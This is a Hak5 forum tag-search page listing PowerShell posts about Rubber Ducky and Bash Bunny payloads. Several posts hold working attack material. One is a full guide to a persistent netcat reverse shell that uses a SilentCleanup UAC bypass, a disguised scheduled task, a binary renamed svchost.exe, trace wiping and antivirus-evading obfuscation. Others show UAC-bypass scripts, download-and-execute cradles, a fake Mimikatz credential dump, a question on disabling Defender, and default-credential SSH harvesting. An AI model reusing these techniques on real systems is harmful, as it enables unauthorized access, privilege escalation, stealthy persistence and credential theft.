Jump to content

Search the Community

Showing results for tags 'powershell'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud CĀ²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Hey everyone I'm trying to get a reverse shell using rubber ducky as Darren's video but in Windows 10. My problem is when I execute powershell_reverse_shell.ps1, windows defender refuse me. How can i disable windows defender through powershell command ? I found this "Set-MpPreference -DisableRealtimeMonitoring $true" but nothing happens. I'm from Argentina and is a little difficult for me so if someone else can help me. I will be so happy
  2. Hi This is my first question here hope someone can help I have converted puty.exe to putty.vbs and also I have also tried convert the exe to base64 Im trying to download (both vbs and base64 exe) it but Im not being able to succeed the vbs is on "https://www.codepile.net/raw/rjzpdEKZ.vbs" but https://www.codepile.net/raw/rjzpdEKZ works too I have tried 1 - IEX (new-object net.webclient).downloadstring("https://www.codepile.net/raw/rjzpdEKZ") 2 - Invoke-Expression -Command $([string]([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Invoke-WebRequest -Uri https://www.codepile.net/raw/rjzpdEKZ).content)))) 3 - & ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Invoke-WebRequest -Uri "https://www.codepile.net/raw/rjzpdEKZ" | Select-Object -ExpandProperty Content)))) 4 - (New-Object System.Net.WebClient).DownloadFile("https://www.codepile.net/raw/rjzpdEKZ","putty.vbs");(New-Object -com Shell.Application).ShellExecute("putty.vbs"); 4 - (New-Object System.Net.WebClient).DownloadFile("https://www.codepile.net/raw/rjzpdEKZ","foo.vbs");(New-Object -com Shell.Application).ShellExecute("foo.vbs"); because the program used to create the vbs file writes a foo.txt file What I might be doing wrong? How can I run it from powershell and a command line? Thanks
  3. Sharkjack.ps1 This is a rewritten (Windows) PowerShell version of Hak5's "sharkjack.sh". Compliments to Hak5 for the Device and the original script. I only take credit for rewriting the script to support Windows. Please Note: SharkLib Options are DISABLED until Hak5 merges SharkLib into the GitHub. If you are having problems getting the file to run. See Post #3. (If you have multiple SharkJacks, type "clearssh" in menu to clear your "known hosts" SSH File of the SharkJack's Fingerprint. Then try to reconnect using SSH via option #5) sharkjack.ps1 # Title: SharkJack Helper Script (PowerShell) # Author: Hak5 (rewritten for Windows by REDD) # Version: 1.2 # Remove for Debugging purposes. $ErrorActionPreference = "SilentlyContinue" # Base Script Variables - DO NOT CHANGE Write-Host "Initializing... One Moment Please..." $console = $host.ui.rawui $console.backgroundcolor = "Black" $console.foregroundcolor = "Green" $colors = $host.privatedata $colors.verbosebackgroundcolor = "Yellow" $colors.verboseforegroundcolor = "Black" $colors.warningbackgroundcolor = "Red" $colors.warningforegroundcolor = "white" $colors.ErrorBackgroundColor = "DarkCyan" $colors.ErrorForegroundColor = "Yellow" $DIR = Convert-Path . # Script Variables $SHARKJACK_IP = "" $REMOTE_PAYLOAD = "root@$SHARKJACK_IP`:/root/payload/payload.sh" $UPGRADE_FILE = 'https://downloads.hak5.org/api/devices/sharkjack/firmwares/1.1.0' $BASEFILENAME = "upgrade-1.1.0.bin" $FIRMWARE_SHA = "03638c7937a1718b6535116eac8b0a75f2a79054e61dc401af56b51da2044386" $PAYLOADDIR = $DIR+'\library' $MENU_SELECTION = 0 $CIRCLE = ([char]8226) Function Header_Ascii { Write-Host "" Write-Host " ########################################################" Write-Host "" Write-Host "" Write-Host " \_____)\_____ Shark Jack _____/(_____/" Write-Host " /--v____ __$CIRCLE< by Hak5 >$($CIRCLE)__ ____v--\" Write-Host " )/ \(" Write-Host "" Write-Host "" Write-Host " ########################################################" Write-Host " Windows Version by REDD" Write-Host "" } Function Initialize { $CONN_SUCC = 0 $LOOP = 0 while ($CONN_SUCC -eq 0) { $connection = Test-Connection "$SHARKJACK_IP" -Count 1 -Quiet If ($connection -eq $true) { Write-Host "SharkJack detected.." Start-Sleep -s 2 $CONN_SUCC = 1; } ElseIf ($connection -eq $false) { If ($LOOP -eq 0) { Write-Host -NoNewline "Please Connect the SharkJack in Arming Mode.." Start-Sleep -s 2 $LOOP = 1; } Else { Write-Host -NoNewline "." Start-Sleep -s 2 } } } } Function Download_Repo { Write-Host "Checking if Connection to Internet is possible with SharkJack connected." Write-Host "" Write-Host "Please Wait.." Write-Host "" $HTTP_Request = [System.Net.WebRequest]::Create('http://google.com') $HTTP_Response = $HTTP_Request.GetResponse() $HTTP_Status = [int]$HTTP_Response.StatusCode If ($HTTP_Status -eq 200) { Write-Host " -> Connection established!" $Connection_Check = 1 } Else { Write-Host " -> Connection Failed!" $Connection_Check = 0 } If ($HTTP_Response -eq $null) { } Else { $HTTP_Response.Close() } Write-Host "" if ( $Connection_Check -eq 1 ) { if (!(Test-Path $PAYLOADDIR)) { Write-Host "Downloading Payload Library from GitHub.. Please Wait." $WebClient = New-Object System.Net.WebClient $WebClient.DownloadFile("https://github.com/hak5/sharkjack-payloads/archive/master.zip","$DIR\master.zip") Write-Host "Extracting Payload Library.." Expand-Archive -LiteralPath $DIR\master.zip -DestinationPath $DIR Get-ChildItem -Path "$DIR\sharkjack-payloads-master" | Copy-Item -Force -Destination "$DIR" -Recurse -Container Get-ChildItem -Path "$DIR\sharkjack-payloads-master\payloads" | Copy-Item -Force -Destination "$DIR" -Recurse -Container Remove-Item $DIR\sharkjack-payloads-master -Force -Recurse -ErrorAction SilentlyContinue Remove-Item $DIR\payloads -Force -Recurse -ErrorAction SilentlyContinue Write-Host "Cleaning up Repo Files.." Remove-Item -path $DIR\master.zip -force Remove-Item -path $DIR\README.md -force Remove-Item -path $DIR\sharkjack.sh -force Write-Host "Finished." Start-Sleep -s 2 } Else { Write-Host "Payload Directory is already present in current Folder." Start-Sleep -s 2 } } Else { Write-Host " Disconnect the SharkJack from the PC OR Set your Internet to" Write-Host " the correct configurations, and try again." Start-Sleep -s 15 } } Function Copy_Payload { if (!(Test-Path $PAYLOADDIR)) { Write-Host "No Payload Library downloaded. Starting Downloading Process." Start-Sleep -s 2 Download_Repo } Initialize $MAINFOLDERS = @(Get-ChildItem $PAYLOADDIR | Select Name | Sort @{Expression={$_.name.length}} -Descending | Out-GridView -Title 'Choose a Directory' -PassThru | Select -ExpandProperty "Name") if (!($MAINFOLDERS)) { Write-Host "ERROR: Please Select a Folder."; Start-Sleep -s 2; Menu-Function } $PAYLOADSELECTDIR = @(Get-ChildItem $PAYLOADDIR\$MAINFOLDERS | Select Name | Sort @{Expression={$_.name.length}} -Descending | Out-GridView -Title 'Choose a Payload' -PassThru | Select -ExpandProperty "Name") if (!($PAYLOADSELECTDIR)) { Write-Host "ERROR: Please Select a Payload."; Start-Sleep -s 2; Menu-Function } $SELECTED_PAYLOAD = $PAYLOADDIR+'\'+$MAINFOLDERS+'\'+$PAYLOADSELECTDIR+'\payload.sh' Write-Host "Copying ->" Write-Host "Source Payload: $SELECTED_PAYLOAD" Write-Host "Destin Payload: $DIR\payload.sh" Write-Host "Remote Payload: $REMOTE_PAYLOAD" Write-Host "" Copy-Item "$SELECTED_PAYLOAD" -Destination "$DIR\payload.sh" Write-Host "Attempting to Push Payload to SharkJack.." scp "$DIR\payload.sh" "$REMOTE_PAYLOAD" Write-Host "Finished." Start-Sleep -s 2 Menu-Function } Function Copy_Dir_Payload { $Current_Payload = $DIR+'\payload.sh' if (!(Test-Path "$Current_Payload" -PathType Leaf)) { Write-Host "No $Current_Payload exists." Start-Sleep -s 7 } Else { Initialize Write-Host "Attempting to Push Payload to SharkJack.." scp "$DIR\payload.sh" "$REMOTE_PAYLOAD" Write-Host "Finished." Start-Sleep -s 2 Menu-Function } } Function Connect_SharkJack { Initialize Write-Host "Attempting to Connect (SSH) to the SharkJack.." ssh "root`@$SHARKJACK_IP" Write-Host "Done." Start-Sleep -s 2 Menu-Function } Function Clean_Known_Hosts { Write-Host "Clearing old SSH Keys for SharkJack. Please Wait.." Get-Content $env:userprofile\.ssh\known_hosts | select-string -pattern "$SHARKJACK_IP" -notmatch | Out-File $env:userprofile\.ssh\known_hosts.new Copy-Item "$env:userprofile\.ssh\known_hosts" -Destination "$env:userprofile\.ssh\known_hosts.bk" Remove-Item -path $env:userprofile\.ssh\known_hosts -force Copy-Item "$env:userprofile\.ssh\known_hosts.new" -Destination "$env:userprofile\.ssh\known_hosts" Remove-Item -path $env:userprofile\.ssh\known_hosts.new -force Write-Host "Removed old SSH Keys for SharkJack. Try to connect again via SSH." Start-Sleep -s 3 Menu-Function } Function Connect_SharkJack_Web { Initialize Write-Host "Attempting to Launch Browser to connect to SharkJack.." start "http://$SHARKJACK_IP/cgi-bin/status.sh" Menu-Function } Function Update_SharkJack { Write-Host "Checking if Connection to Internet is possible with SharkJack connected." Write-Host "" Write-Host "Please Wait.." Write-Host "" $HTTP_Request = [System.Net.WebRequest]::Create('http://google.com') $HTTP_Response = $HTTP_Request.GetResponse() $HTTP_Status = [int]$HTTP_Response.StatusCode If ($HTTP_Status -eq 200) { Write-Host " -> Connection established!" $Connection_Check = 1 } Else { Write-Host " -> Connection Failed!" $Connection_Check = 0 } If ($HTTP_Response -eq $null) { } Else { $HTTP_Response.Close() } If ( $Connection_Check -eq 1 ) { $FIRMWARE_FILE = $DIR+'\'+$BASEFILENAME Write-Host "Downloading Firmware from $UPGRADE_FILE" $WebClient = New-Object System.Net.WebClient $WebClient.DownloadFile("$UPGRADE_FILE","$FIRMWARE_FILE") Write-Host "Checking SHA256 of $FIRMWARE_FILE" $CHK_DOWNLOAD = (Get-FileHash -Path $FIRMWARE_FILE -Algorithm "SHA256" -ErrorAction Stop).Hash If ($CHK_DOWNLOAD -ne $FIRMWARE_SHA) { Write-Host "SHA265 DOES NOT MATCH! Deleting $BASEFILENAME" del "$FIRMWARE_FILE" Write-Host "Done. Please Retry again." Start-Sleep -s 5 Menu-Function } Else { Write-Host "SHA256 Matches! Continuing Upgrade.." Write-Host "" Write-Host "Attempting to start the Upgrade Process.." Write-Host "------------------------------------------------------" Write-Host "PLEASE ONLY DO THIS IF YOU KNOW WHAT VERSION YOUR" Write-Host "SHARKJACK IS ON." Write-Host "" $Confirm_Update = Read-Host "THIS WILL ERASE EVERYTHING ON THE SHARKJACK! ARE YOU SURE? (y/[N])" Switch ($Confirm_Update) { Y {Write-host "Confirmed!"; $Update_Confirm_Status = 1} N {Write-Host "Not Confirmed!"; $Update_Confirm_Status = 0} Default {Write-Host "No Input detected. Defaulting to NO."; $Update_Confirm_Status = 0} } If ( $Update_Confirm_Status -eq 1 ) { Initialize Write-Host "Wait 5-10 minutes as the Shark Jack flashes the firmware and reboots." Write-Host "DO NOT unplug the device from USB power during this process as doing so will render the device inoperable." Write-Host "" Write-Host "Pushing $BASEFILENAME to SharkJack." scp "$FIRMWARE_FILE" "root`@$SHARKJACK_IP`:/tmp/$BASEFILENAME" Write-Host "Initializing Upgrade.." ssh "root`@$SHARKJACK_IP" "sysupgrade -n /tmp/$BASEFILENAME" Write-Host "Upgrade started.. Waiting 30s.." Start-Sleep -s 30 Write-Host "Wait for SharkJack to start in Arming Mode.." Write-Host "" Write-Host "Once SharkJack has shut itself down.. It will reboot." Start-Sleep -s 2; Initialize } Else { Write-Host "Returning to Menu." Start-Sleep -s 2 Menu-Function } } } Else { Write-Host " Disconnect the SharkJack from the PC OR Set your Internet to" Write-Host " the correct configurations, and try again." Start-Sleep -s 15 } } Function Cleanup { if (Test-Path $PAYLOADDIR) { Write-Host "Found $PAYLOADDIR.. Removing.." Remove-Item $PAYLOADDIR -Force -Recurse -ErrorAction SilentlyContinue } if (Test-Path $DIR\sharkjack.sh) { Write-Host "Found sharkjack.sh.. Removing.." Remove-Item $DIR\sharkjack.sh -Force } if (Test-Path $DIR\$BASEFILENAME) { Write-Host "Found $BASEFILENAME.. Removing.." Remove-Item $DIR\$BASEFILENAME -Force } if (Test-Path $DIR\payload.sh) { Write-Host "Found payload.sh.. Removing.." Remove-Item $DIR\payload.sh -Force } Write-Host "Everything cleaned up." Start-Sleep -s 2 Menu-Function } Function Disabled_Func { Write-Host "" Write-Host "ERROR: Sorry the Selection you made has been disabled." Write-Host "ERROR: Please contact REDD or Hak5 regarding this message." Write-Host "" Start-Sleep -s 5 Menu-Function } Function Menu-Function { $MENU_SELECTION = 0 clear Header_Ascii $type=Read-Host " 1 - [D]ownload Payload Library from GitHub 2 - Install SharkLib to Shark[J]ack 3 - Remove Shark[L]ib from SharkJack 4 - [C]opy Payload to SharkJack (Interactive) 5 - Copy [P]ayload from SharkJack.ps1 Directory 6 - Connect to SharkJack [S]SH 7 - Connect to SharkJack [W]eb UI (1.0.1+) 8 - [U]pdate SharkJack 9 - [R]emove ALL Downloaded Files 0 - [E]xit Please select a # OR [L]etter and press ENTER" Switch ($type){ 1 {$MENU_SELECTION = 1; Download_Repo} D {$MENU_SELECTION = 1; Download_Repo} 2 {$MENU_SELECTION = 1; Disabled_Func} 3 {$MENU_SELECTION = 1; Disabled_Func} 4 {$MENU_SELECTION = 1; Copy_Payload} C {$MENU_SELECTION = 1; Copy_Payload} 5 {$MENU_SELECTION = 1; Copy_Dir_Payload} P {$MENU_SELECTION = 1; Copy_Dir_Payload} 6 {$MENU_SELECTION = 1; Connect_SharkJack} S {$MENU_SELECTION = 1; Connect_SharkJack} 7 {$MENU_SELECTION = 1; Connect_SharkJack_Web} W {$MENU_SELECTION = 1; Connect_SharkJack_Web} 8 {$MENU_SELECTION = 1; Update_SharkJack} U {$MENU_SELECTION = 1; Update_SharkJack} 9 {$MENU_SELECTION = 1; Cleanup} R {$MENU_SELECTION = 1; Cleanup} clearssh { $MENU_SELECTION = 1; Clean_Known_Hosts} E { Write-Host "Exiting.. Please Wait."; Exit } 0 { Write-Host "Exiting.. Please Wait."; Exit } } } Initialize while ($MENU_SELECTION -eq 0) { Menu-Function }
  4. Hi everybody! So I'm simply trying some download cradles on powershell on a Windows 7. I wanted to download this test powershell script (fake Mimikatz) : https://pastebin.com/FvASwLVQ that runs calculator and print some random informations and I wanted to run the main function. So I run the following command : powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds" And immediatly after that nothing happens I'm still on the same Powershell and I can't open a a new Powershell console by any means unless I restart my computer. The thing is I tested the same command with other scripts and I get the same results... The IEX command without the "powershell -c" works perfectly and the first command works on every Windows 10! So anyone know the problem? Thanks! PSVersion : 5.1.14409.1005
  5. Link to my original reddit post So how do we create such reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file. Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell: cd $env:public $url1="YOUR_NC64_LINK" $url2="YOUR_XML_LINK" $path1="$env:public\svchost.exe" $path2="$env:public\x.xml" (new-object net.webclient).downloadfile($url1,$path1) (new-object net.webclient).downloadfile($url2,$path2) cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml' So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created. Now you're probably thinking, this is all nice, but how the fk do I run this in one-line of code? Very simple, by invoking expression called DownloadString in powershell like this: powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')" But problem with this one-liner is, that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit: cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))" And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.
  6. In theory, this bash bunny script should make a directory in C:\Windows called uac-bypassed I have no way to test this specific script because I don't have a bash bunny or a rubber ducky, so I had to make do with a P4wnP1 A.L.O.A. any help making this payload smaller would be greatly appreciated. (The command at the bottom is for the P4wnP1 A.L.O.A) Q GUI R Q powershell Q ENTER Q DELAY 500 Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1" Q ENTER Q Set-ExecutionPolicy RemoteSigned -Scope CurrentUser Q ENTER Q DELAY 500 Q a Q .\\uac.ps1 Q ENTER Q rmdir uac.ps1 Q ENTER Q Set-ExecutionPolicy Undefined -Scope CurrentUser Q ENTER Q DELAY 500 Q a Q ENTER Q exit Q ENTER P4wnP1_cli hid run -c 'layout("us"); typingSpeed(15,0); press("GUI R"); type("powershell"); press("ENTER"); delay(500); type(" echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type(".\\uac.ps1"); press("ENTER"); type("rmdir uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy Undefined -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type("exit"); press("ENTER");'
  7. Hi everyone! First of all, sorry if my English is not that good, It's not my main language. I just signed up to the forum to post this, after watching the video Darren made about a payload that changes the Desktop background. I had this idea after he mentioned that the Lockscreen background could not be changed due to the fact that there isn't a "stable" method and it needed admin privileges. So I made a script which, when opened as standard user, respawns itself in a hidden window with full admin privileges and executes whatever payload you put in it. Here it is: if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator } else { $registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } Explanation: There's a task in Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe Since it runs as Users, and we can control user's environment variables, we can change %windir% (normally pointing to C:\Windows) to point to whatever we want, and it'll run as admin. The first line if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) basically checks if we are admin, so that the script can detect whether it has been called by the user or by the task, and do stuff accordingly. Everything that need admin privs goes in this block of the if statement, while in the "else" block goes what can be run as standard user, including the bypass itself. The "Set-ItemProperty" line creates a new Registry Key "HKCU:\Environment\windir" in order to change the %windir% variable value to the command we want to be run as admin, in this case powershell -ep bypass -w h $PSCommandPath;# "$PSCommandPath" evaluates to our script path, "-ep bypass" is equal to "-ExecutionPolicy bypass" and "-w h" to "-WindowStyle hidden". The ";#" part is needed to comment out the rest of the path of the task from the command. So, in the end, the task's execution path evaluates to: powershell -ExecutionPolicy bypass -WindowStyle hidden <path of the script> ;#\System32\cleanmgr.exe The "schtasks" command will simply ask Windows to run the task with the now modified %windir% and "Remove-ItemProperty" will just delete the reg key after the task has been executed in order to not break other things and/or leave traces of the "attack". When the task runs, it will call the script with full fledged admin privs, so now the first block of the if statement is executed and our payload can do whatever we want. Note: In order to work, the code must be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog. However, if our payload is small enough to fit entirely in the %windir% variable, we can reduce the whole script to just the three fundamental lines, i.e. "Set-ItemProperty", "schtasks" and "Remove-ItemProperty". (Idk if it can fit in the run dialog though) Note2: I think it could break if the the script is in a path that contains spaces, but I think it's easily fixable by escaping the $PSCommandPath in the $Value variable
  8. Hello! I have a question. How to download shell from powershell (from win+r). Can someone write me a command to bunny?
  9. Hello all! I would your help to solve an issue , nothing in loot folder. i already see mentioned into many posts but really got no a solution from here. Hands on a a Fresh NEW Bash Bunny with an outdated firmware ,windows 7 Ultimate x64 Pc. Keyboard settings are US for win7, and from factory in BB. If i open config.txt i read just: #!/bin/bash #This configuration file is used to set default variables DUCKY_LANG us Go ahead Updated the firmware, downloading the updater here https://bashbunny.com/setup , the payloads library and all will be updated too Fixed the device driver for the Gadget serial > opening the device manager on win7,found the alert near device, update driver >select the Bash Bunny path. The driver will be searched into the subfolders and installed. So rerun BB. i tried and i got connection with a shell on port COM4 with Putty . I have to run a script. Open library folder and copy content of H:\payloads\library\credentials\PasswordGrabber into H:\payloads\switch2 Download to Tool folder the laZagneX64.exe file , *also tried to rename it in laZAgne.exe That"s all. Switched to 2 and run BB. Result> only an EMPTY PasswordGrabber folder in Loot folder. ON SCREEN> I seen 2 popup windows, Run command from Win7 and a Terminal window black clean for just a second. Have Somebody solved this, and HOW ???? Thanks alot Quixx
  10. So, it has been a bit since I did any work on the BBTPS so posting some work I began doing on it. First, I have gotten some messages about the BBTPS needing to use npm to get Express before adding to Bunny. If you pull the No_Express branch, you will only need to copy it to the Bunny. No Node dependencies needed. That one had the web server rewritten to use core modules instead of addons. First, current bug: If your script is huge and you specify it to be a process, it may not run. This is due to the cmdline 8191 character limit. The process launcher in the BBTPS launches a new powershell process with your script as a compress/encoded command. If it is too big, it gets truncated. I am working on a different method so any size script could be fired as a process. Running it in a thread works fine since it runs as a job script within the agent. Work around would be to store the script in the /loot/bbtps folder and have a script in your joblist as a process that pulls the main script through SMB server that is running and execute it. What led to this discovery was another user pointing out issues with Powercat I included, which is a huge script and broke because of the limit. Stuff I am working on: Welp, for one I am refactoring the node server. This is to make it easier to future changes that require changes to the server which leads into the next change. The quack scripts control are being moved over to the node server. The launcher for the agent will not launch directly from the payload.txt but by the node server when it comes online. This will reduce the stager size since I will not need the looping wait counter to wait for the server to come up anymore. A new field is being added to the joblist.json schema called admin that will be boolean. This field specifies if the script requires admin rights. This leads to the new feature I am working on Autoadmin. No need to guess if the user is admin or not. The BBTPS will fire off a non-privilege command prompt. It will then fire a non-hidden stager that will pull down stage1 which will check for certain requirements. After checking, a signal is sent back the the node server running on the Bashbunny. The signal depends on if the user is a local admin or not. If they are then the signal will cause the Bashbunny node server to quack out the commands in the still open cmd prompt to launch a hidden stager elevated and even quack out the keystrokes to select yes. If the user is not admin then a normal hidden stager is launched with no extra keystrokes needed. On the server the joblist it has will filter out admin jobs if the user is not admin or keep them and run them with the non-admin jobs if user is admin. Non-admin jobs always run. Reduction of config files...well by 1. I am removing the payselect.txt file for config selection. It can be done from within the payload.txt file. The joblist.json file that lists the scripts is still there (how else are you going to be able to have different lists of scripts to run ready to go?) and the config file for the joblist is still needed to be configured (this is how you select the folder that has your scripts and the joblist file to use along with the quack delays and other fine tunings or do all your joblists work the same way?). The other files are still needed to preconfigure all your different job packs so if you want to switch, you just need to change the config file name in the payload.txt. HoppEye8x by H8.to. This will come in a later version as I am still working out a good way to implement this though would extend the possibility of being able to on the fly select out of 8 preloaded jobpacks you preconfigure to launch. This would extend the number of scripts you can run by 8x the number of scripts you have configured in each jobpack per. More work on instructions. I figured out I had issues with my instructions because I was trying to instruct on proper powershell module writing at the same time (which is not required for the BBTPS to work with but makes them way more easier to be ported around in into different jobpacks). New instructions will only include how to install, where all the configuration is done and their mean and use the current sample I have as an example of how it works so the samples will include the new methods. Just to reiterate, the BBTPS is a tool, not a payload. Payloads included with the BBTPS and jobpacks created from them in the repo are from other projects and there as example of usage not as included functions of the tool.
  11. Hi all, This works fine... Get-WMIObject -Class Win32_UserProfile | Select -Expandproperty LocalPath However, the following does not. What am I doing wrong with the syntax here? Get-WMIObject -Class Win32_UserProfile | where {($.LocalPath -eq 'C:\Users\JoeBloggs')} $.LocalPath : The term '$.LocalPath' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:50 + Get-WMIObject -Class Win32_UserProfile | where {($.LocalPath -eq 'C:\Users\JoeBloggs ... + ~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: ($.LocalPath:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException
  12. Hi there, I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default. I am currently unaware of a good solution to circumvent a system wide proxy in powershell, especially without local admin. Any ideas? Best regards! F
  13. In order to provide a PoC that non-administrative access still can result in huge data breaches I present to you The Hidden PP Attack A one liner PoSh command that can be executed from a Teensy/Rubber Ducky which leaves the machine open to injections of PoSh code remotely. Quite happy with this project so I thought id drop it here. Ive lurked remotely without an account for some time without contributing, so... here you are https://simpleinfosec.com/2018/01/09/the-hidden-pp-attack-a-non-administrative-remote-shell-for-data-exfiltration/ https://github.com/secsi/HIDdenPPAttack
  14. For a larger project, I am exploring the use of Powershell to automate network tasks. In the enclosed script, I am assuming someone has a Raspberry Pi named PiM3.local with default username and password on my local network. I use Posh-SSH which can be installed within Powershell by Install-Module Posh-SSH . I then execute a command with SSH, grab the .bash-history and put a new file in the Pi. One could, of course, use nmap to find computers with port 22 and then proceed with something like this to see what happens. One could of course use the wifi pineapple to ... and so on. Are there loose pi's where you live? RaspberySFTP.ps1
  15. Hello everyone! I recently ordered a Rubber Ducky and while I wait for it to get here I thought I would start setting up a script. What I want to do in short is the following.. 1. Open Powershell as Admin āœ” 2. Bypass UAC āœ” 3. Change the PS window size āœ” 4. Open Google Chrome in a NEW window, not as a new tab. The reasoning behind this is because I would like to open the Chrome window in front of the PS window so it can be hidden during script execution. I would potentially even want to open 3 or 4 tabs in the new window. I spent quite a bit of time trying to figure out how to open a new window but most of the time I could only open a new tab. (Yes, I had Chrome open during testing of the command via powershell. Any suggestions/improvements/ideas are greatly appreciated! I look forward to unleashing the DUCK. DELAY 1000 GUI r DELAY 100 STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the powershell window STRING mode con:cols=18 lines=1 ENTER STRING Start-Process "chrome.exe" "www.google.com"
  16. Hi all, I'm creating a PowerShell script and am attempting to use; "$variable1,$variable2,$variable3" | Add-Content -Path "file.csv" -Encoding UTF8 The variables echo/write-host as; Variable1 Hello Variable2 World Variable3 Hello World My issue is that the Add-Content above should create a CSV file like this; Hello,World,Hello World But it doesn't. Instead, it creates; Hello,World,Hello World How can I go about using Add-Content to export to CSV, but get it to ignore new lines? Opened in Excel, I want 'cell' C1 to be 'Hello World', but at the moment it's creating cell C1 as "Hello" and cell A2 (which shouldn't even exist in this case) as " World" Note: I'm stuck with PowerShell version 3 unfortunately. Thank you.
